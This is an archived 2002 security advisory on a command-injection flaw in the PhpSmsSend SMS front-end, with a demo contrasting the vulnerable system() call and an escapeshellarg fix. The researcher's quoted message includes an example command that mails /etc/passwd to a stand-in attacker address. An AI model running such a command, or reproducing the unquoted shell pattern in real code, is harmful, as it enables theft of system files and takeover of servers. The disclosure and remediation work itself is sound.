PhpSmsSend Front-End to SmsSend Allows Remote Users to Execute Arbitrary System Commands on the Server
|
SecurityTracker Alert ID: 1003395
|
CVE Reference: GENERIC-MAP-NOMATCH
|
Date: Jan 30 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Version(s): 1.00
|
Description: A vulnerability was reported in the PhpSmsSend frontend to SmsSend. A user can execute arbitrary commands on the web server.
A remote user can supply an SMS message to the PhpSmsSend application to execute arbitrary shell commands on the web server. This is reportedly due to the following code from file.php:
$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
system($str,$res);
Because $params is placed into the command string without quoting or escaping, a remote user can enter an SMS message containing a backtick character ("`") so that the text following the backtick (and preceding the next backtick) will be executed by the shell that the system() call invokes.
The command will be executed with the privileges of the web server.
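The following is an added example, not PhpSmsSend code and not from the original report: it builds the command line the way the quoted code does and beside it a form that quotes each user-supplied field. The constant values, the split of $params into number and message, the ".sms" name pattern and both function names are assumptions; /bin/echo stands in for the smssend binary so the script runs offline.

```php
<?php
// Assumed values (not from the advisory); /bin/echo replaces smssend.
define('SMSSEND', '/bin/echo');
define('SCRIPTSPATH', '/usr/share/smssend/');
define('PROXY', '');

// Command string built as in the advisory: $params is pasted in unquoted,
// so the shell started by system() interprets any metacharacters in it.
function build_vulnerable(string $script, string $params): string
{
    return SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
}

// Hardened form (hypothetical helper): the script name must match a fixed
// pattern, and each user-supplied field is quoted separately.
function build_hardened(string $script, array $fields): string
{
    // Assumed naming rule; rejects path separators and shell characters.
    if (!preg_match('/^[A-Za-z0-9_-]+\.sms$/', $script)) {
        throw new InvalidArgumentException('unexpected script name');
    }
    $quoted = array_map('escapeshellarg', $fields);
    return escapeshellarg(SMSSEND).' '.escapeshellarg(SCRIPTSPATH.$script)
        .' '.implode(' ', $quoted).' -- -d 0 '.PROXY;
}

// Constructed input: a placeholder number and a message with backticks.
$number  = '0000000000';
$message = 'hello `echo INJECTED` world';

$vuln = build_vulnerable('example.sms', "$number $message");
$safe = build_hardened('example.sms', [$number, $message]);

// Vulnerable: the shell runs the backtick text before the program starts,
// so the program receives the command's output instead of the message.
echo "vulnerable: ", shell_exec($vuln);

// Hardened: the message arrives as one literal argument, backticks intact.
echo "hardened:   ", shell_exec($safe);

// escapeshellarg() only stops shell interpretation. A field beginning
// with "-" is still passed to the program and may be read as an option.
```

On PHP 7.4 and later, proc_open() also accepts the command as an array and starts the program without a shell, which removes the quoting step altogether.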
|
Impact: A user can execute arbitrary system commands on the web server with the privileges of the web server.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: zekiller.skytech.org/smssend.php
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Indra Kusuma <indra@kusuma.or.id>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 29 Jan 2002 18:57:51 +0000 (GMT)
From: Indra Kusuma <indra@kusuma.or.id>
Subject: PhpSmsSend remote execute commands bug
|
---[ PhpSmsSend remote execute commands bug
---[ About PhpSmsSend
PhpSmsSend is a frontend to the SmsSend application. It consists of a
.php file, from which you select one of the available scripts, and then
you can send an SMS wherever you want, all around the world.
PhpSmsSend's website is http://zekiller.skytech.org/smssend.php
---[ Affected System
PhpSmsSystem Version 1.00
---[ Description
From file .php:
$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
system($str,$res);
If the SMS message contains a backtick "`", then the text inside the
backticks will be executed as a system command.
The result of the command will be sent via SMS :), so the command output
should be less than 160 characters to send via SMS, but if the command
uses a pipe (ex: cat /etc/passwd|mail evil@hacker.com) or redirection, then
the message status is successful :)
---[ Greetz
my Guru GaniSalman, my friend OpsCrew, #indoSniffing and
#medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM
(lug.stikom.edu), and the gauli.com owner
---
cheers,
IndraKusuma
|